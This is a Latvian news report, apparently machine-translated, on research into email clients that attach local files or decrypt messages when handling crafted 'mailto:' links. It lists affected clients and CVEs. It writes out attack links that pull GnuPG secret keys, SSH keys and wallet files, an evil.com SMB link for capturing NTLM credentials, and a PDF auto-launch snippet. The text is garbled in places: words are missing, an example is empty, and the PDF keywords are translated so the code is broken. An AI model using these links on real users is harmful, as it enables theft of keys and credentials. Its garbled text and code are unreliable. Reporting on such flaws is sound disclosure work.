Pētnieki no Rūras universitātes Bohumā (Vācija) () pasta klientu uzvedība, apstrādājot “mailto:” saites ar uzlabotiem parametriem. Pieci no divdesmit pārbaudītajiem e-pasta klientiem bija neaizsargāti pret uzbrukumu, kas manipulēja ar resursu aizstāšanu, izmantojot parametru “attach”. Vēl seši e-pasta klienti bija neaizsargāti pret PGP un S/MIME atslēgu nomaiņas uzbrukumu, un trīs klienti bija neaizsargāti pret uzbrukumu, lai iegūtu šifrētu ziņojumu saturu.
Saites «"tiek izmantoti, lai automatizētu e-pasta klienta atvēršanu, lai rakstītu vēstuli saitē norādītajam adresātam. Papildus adresei kā saites daļu varat norādīt papildu parametrus, piemēram, vēstules tēmu un tipiska satura veidni. Ierosinātais uzbrukums manipulē ar parametru “attach”, kas ļauj ģenerētajam ziņojumam pievienot pielikumu.
Pasta klienti Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) un Pegasus Mail bija neaizsargāti pret triviālu uzbrukumu, kas ļauj automātiski pievienot jebkurš lokālais fails, kas norādīts, izmantojot saiti, piemēram, “mailto:?attach=path_to_file”. Fails tiek pievienots bez brīdinājuma parādīšanas, tāpēc bez īpašas uzmanības lietotājs var nepamanīt, ka vēstule tiks nosūtīta ar pielikumu.
Piemēram, izmantojot saiti, piemēram, “mailto:[e-pasts aizsargāts]&subject=Nosaukums&body=Teksts&attach=~/.gnupg/secring.gpg" jūs varat ievietot privātās atslēgas no GnuPG vēstulē. Varat arī nosūtīt kriptomaku saturu (~/.bitcoin/wallet.dat), SSH atslēgas (~/.ssh/id_rsa) un visus lietotājam pieejamos failus. Turklāt Thunderbird ļauj pievienot failu grupas, izmantojot masku, izmantojot tādas konstrukcijas kā “attach=/tmp/*.txt”.
Papildus lokālajiem failiem daži e-pasta klienti apstrādā saites uz tīkla krātuvi un ceļiem IMAP serverī. Konkrēti, IBM Notes ļauj pārsūtīt failu no tīkla direktorija, apstrādājot saites, piemēram, “attach=\\evil.com\dummyfile”, kā arī pārtvert NTLM autentifikācijas parametrus, nosūtot saiti uz SMB serveri, ko kontrolē uzbrucējs. (pieprasījums tiks nosūtīts ar pašreizējo autentifikācijas parametru lietotāju).
Thunderbird veiksmīgi apstrādā pieprasījumus, piemēram, “attach=imap:///fetch>UID>/INBOX>1/”, kas ļauj pievienot saturu no IMAP servera mapēm. Tajā pašā laikā pasta klients pirms nosūtīšanas automātiski atšifrē ziņojumus, kas izgūti no IMAP un šifrēti, izmantojot OpenPGP un S/MIME. Thunderbird izstrādātāji bija par problēmu februārī un numurā problēma jau ir novērsta (Thunderbird 52., 60. un 68. zari joprojām ir neaizsargāti).
Thunderbird vecās versijas bija arī neaizsargātas pret diviem citiem pētnieku ierosinātajiem uzbrukuma variantiem PGP un S/MIME. Jo īpaši Thunderbird, kā arī OutLook, PostBox, eM Client, MailMate un R2Mail2 tika pakļauts atslēgas nomaiņas uzbrukumam, ko izraisīja fakts, ka pasta klients automātiski importē un instalē jaunus sertifikātus, kas tiek nosūtīti S/MIME ziņojumos, kas ļauj uzbrucējs, lai organizētu lietotāja jau saglabāto publisko atslēgu aizstāšanu.
Otrais uzbrukums, pret kuru ir pakļauti Thunderbird, PostBox un MailMate, manipulē ar melnrakstu ziņojumu automātiskās saglabāšanas mehānisma funkcijām un ļauj, izmantojot mailto parametrus, uzsākt šifrētu ziņojumu atšifrēšanu vai digitālā paraksta pievienošanu patvaļīgiem ziņojumiem, sekojoša rezultāta pārsūtīšana uz uzbrucēja IMAP serveri. Šajā uzbrukumā šifrētais teksts tiek pārsūtīts, izmantojot parametru “body”, un tags “meta refresh” tiek izmantots, lai uzsāktu zvanu uz uzbrucēja IMAP serveri. Piemēram: ' '
Lai automātiski apstrādātu “mailto:” saites bez lietotāja iejaukšanās, var izmantot īpaši izstrādātus PDF dokumentus - OpenAction darbība PDF failā ļauj automātiski palaist mailto apstrādātāju, atverot dokumentu:
%PDF-1.5
1 0 obj
<< /Tips /Katalogs /OpenAction [2 0 R] >>
endobj
2 0 obj
<< /Ierakstiet /Action /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE——[…])>>
endobj
Avots: opennet.ru